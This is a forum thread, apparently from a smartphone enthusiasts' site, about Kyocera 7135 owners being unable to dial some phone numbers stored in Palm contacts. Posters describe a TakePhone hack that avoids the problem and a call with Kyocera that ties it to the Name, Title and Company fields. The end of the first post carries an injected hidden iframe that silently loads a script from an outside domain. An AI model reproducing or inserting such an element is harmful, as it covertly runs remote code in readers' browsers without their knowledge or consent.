+ Reply to Thread

Phone book problems

In some contacts with multiple phone numbers, using the navigation button I can call the first X listings, but not subsequent ones, where X is a variable number. X sometimes equals 1, 2 or 3. So far, I cannot detect a pattern to the problem - in some contacts all numbers are accessible.

The problem is consistent within a contact - the same contact always performs the same way. I can create a new contact with the same phone numbers and am able to dial all.

Also, in transfer of data from 6035 to 7135 via hot sync, I lost the palm categories (business, personal, restaurants, etc.). Irritating but recoverable.

Anyone experience anything similar? Suggestions?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Oxo

I am experencing the same problem - seems that with any contact that was hotsynced from outlook to my 7135 will allow the first 2 numbers (or 3) to be dialed, but fields 3 (or 4) on will not dial.

As you also mentioned, if I create the contact on the 7135, all fields dial before and after hotsync with Outlook.

I'm actually on hold with Kyocera about another issue now but will bring this up to them as now I know its not just me

Regards - John

DRC
    Any chance the scan is interrupted by a non-phone number?
    Like up to where an email address is, in the entry?
    DRC

I found a fix, but I don't know why it works. I installed TakePhone, the application and the hack, and later deleted the application but kept the hack active and the problem disappeared. Disabled the hack and the problem came back.
    I had no problem with TakePhone, but just wasn't that thrilled with it, although others apparently are and I pick up that the programmer is extraordinarily responsive.
    Oxo

DRC: The problem wasn't consistent with e-mail addresses or other patterns within the contact. I was able to build the same contact and have it work until I made an entry in the Title section of the phone book. After the TakePhone hack was activated, though, no problems at all.
    Oxo

OK - just got off the phone with Kyocera. Talked to them about the contact dialing issue and noted that I have seen others mention this same problem on SmartphoneSource.com.

They sounded as if they knew something about it, but not much. I helped them trouble shoot it and here are the gory details:

The default structure of the Palm Address Book is as follows:
    Last Name
    First Name
    Title
    Company
    Work (changeable)
    Home (changeable)
    Fax (changeable)
    Other (changeable)
    Email (changeable)
    Address…..etc…

This means that there are 5 fields (the changeable ones) in the that you can take action on by the phone (call, email, sms, etc.)

So for my contact, here is what I (kind of :o) see in my address book:

Chybinski
    John
    IT Manager
    ????-TV
    Work: 211-123-1111
    Home: 211-321-1111
    Fax: 211-123-1112
    Email: xxx123@mymail.com
    Mobile: 261-222-1111

In this setup, I can dial Work and Home, nothing else. BUT, if I remove 1 of the three items directly above "work" (i.e. First Name, Title or Company) I can now dial Fax. Remove 2 and I can dial FAX and use the Email field. Remove all 3 and I can dial Fax, Email and Mobile.

Interesting huh? Well, maybe not - but there *is* something wrong with the Verizon phones. Not sure if the Altel ones do this too?

Kyocera indicated that Verizon is @ work on a software update, but was not sure if this was known and if it was slated to be fixed. I, in a nice way, tried to make the point that if you can't dial from the address book, it defeats the purpose of it being a "SmartPhone" and that *not* using those above fields was an unacceptable solution.

So there you go - not sure what that says to all of you, but I offer it anyhow.

Regards - John